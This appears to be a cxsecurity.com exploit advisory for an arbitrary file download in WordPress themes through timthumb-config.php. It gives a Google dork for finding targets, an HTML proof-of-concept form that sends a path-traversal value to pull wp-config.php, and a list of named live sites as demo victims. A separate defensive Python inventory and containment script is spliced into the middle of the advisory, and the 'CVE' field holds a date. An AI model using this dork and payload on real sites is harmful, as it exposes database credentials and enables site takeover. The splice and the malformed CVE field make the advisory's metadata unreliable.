Wordpress Themes Arbitrary File Download timthumb-config.php Vulnerability

2016.08.29
Credit: hacker.khan
Risk: Medium
Local: No
Remote: Yes
CVE: 2016-08-27

##########################
# Exploit Title: Wordpress Themes Arbitrary File Download timthumb-config.php Vulnerability
# Google Dork : wp-content/themes/lib/timthumb-config.php
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# Tested on : Windows7
##########################
# Wordpress Multi Themes Arbitrary File Download: an exploit that allows attackers to download
# files from your website. The vulnerable file is: timthumb-config.php
# So any WordPress theme that ships this file is potentially vulnerable.
######################
Exploit :
www.site.com/wp-content/themes/infocus/lib/scripts/timthumb/timthumb-config.php
#####################
<html>
<body>
<form action="http://www.site.com/wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>
<input type="submit">
</form>
</body>
</html>
##############################
Demo :
http://stepsandwings.net/wp-content/themes/infocus/lib/scripts/timthumb/timthumb-config.php
http://www.aimmachines.com//wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php
http://www.deepwebtech.com/wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php
http://clarksonjewelers.com/wp-content/themes/elegance/lib/scripts/timthumb/timthumb-config.php
###################################
# Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran || Ormazd || Sh@d0w || MaMaD_Malware || OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous .
# Discovered By: Hacker Khan
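As an added defender-side example (this is not code from the advisory or from any theme), the Python below does the two things a site owner wants after reading the above: it inventories a wp-content/themes tree for every timthumb-config.php and flags the copies whose source mentions the _mysite_download_skin parameter the PoC form posts (assumption: the vulnerable handler names that parameter literally), and it shows the containment check such a download handler should have had, resolving the requested name with realpath and refusing anything that does not land inside the theme's own skin directory. The function names, the throwaway directory tree and the file contents are all constructed for the demonstration.

```python
"""Inventory and containment-check helpers for the timthumb-config.php download bug (added example)."""
import os
import tempfile
from pathlib import Path

VULN_FILE = "timthumb-config.php"
PARAM = "_mysite_download_skin"   # POST parameter name taken from the advisory's PoC form


def resolve_within(base_dir, requested):
    """Return the real path of `requested` only if it is a regular file inside base_dir.

    Both sides are canonicalised with realpath, so '..' segments, absolute
    paths and symlinks that point outside base_dir are all rejected (None).
    This is the check a skin-download handler needs before calling readfile().
    """
    base = Path(os.path.realpath(base_dir))
    candidate = Path(os.path.realpath(os.path.join(base, requested)))
    try:
        candidate.relative_to(base)
    except ValueError:
        return None              # escaped the skin directory
    if candidate == base or not candidate.is_file():
        return None              # empty name, a directory, or a missing file
    return candidate


def find_timthumb_config(themes_root):
    """Inventory every timthumb-config.php under a wp-content/themes tree.

    Returns [(path relative to themes_root, reads_param)], where reads_param
    is True when the file's source mentions the _mysite_download_skin
    parameter (assumption: the vulnerable handler names it literally).
    """
    root = Path(themes_root)
    results = []
    for path in sorted(root.rglob(VULN_FILE)):
        try:
            source = path.read_text(errors="replace")
        except OSError:
            source = ""
        results.append((path.relative_to(root).as_posix(), PARAM in source))
    return results


def build_demo_tree():
    """Create a throwaway WordPress-like tree (constructed sample data) and return its root."""
    root = Path(tempfile.mkdtemp(prefix="wp-demo-"))
    (root / "wp-config.php").write_text("<?php define('DB_PASSWORD', 'example-secret');\n")
    skin_dir = root / "wp-content" / "themes" / "awake" / "lib" / "scripts" / "timthumb"
    skin_dir.mkdir(parents=True)
    # Stand-in for the affected handler: only the parameter name matters to the scan
    (skin_dir / VULN_FILE).write_text(
        "<?php // constructed stand-in: serves the file named in $_POST['" + PARAM + "']\n")
    (skin_dir / "default-skin.css").write_text("body { color: #333; }\n")
    # A second theme carrying a same-named file that never reads the parameter
    other = root / "wp-content" / "themes" / "clean" / "lib"
    other.mkdir(parents=True)
    (other / VULN_FILE).write_text("<?php // configuration only, no download logic\n")
    return root


def demo():
    """Run the inventory and the containment check against the constructed tree."""
    root = build_demo_tree()
    skin_dir = root / "wp-content" / "themes" / "awake" / "lib" / "scripts" / "timthumb"
    return {
        "inventory": find_timthumb_config(root / "wp-content" / "themes"),
        # the traversal string from the advisory's form: must be refused
        "traversal": resolve_within(skin_dir, "../../../../../wp-config.php"),
        # an absolute path to the same secret: must also be refused
        "absolute": resolve_within(skin_dir, str(root / "wp-config.php")),
        # a real skin file inside the allowed directory: served
        "legit": resolve_within(skin_dir, "default-skin.css"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Point `find_timthumb_config()` at a real `wp-content/themes` directory to list the copies you are carrying; any entry flagged True deserves removal or replacement of the theme's timthumb bundle. `resolve_within()` is written as the shape of the fix, not as a drop-in for the PHP file: the same realpath-and-prefix comparison ported into the handler is what stops `../../../../../wp-config.php` from being served.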

References:

hacker.khan@xtra.co.nz


Copyright 2017, cxsecurity.com
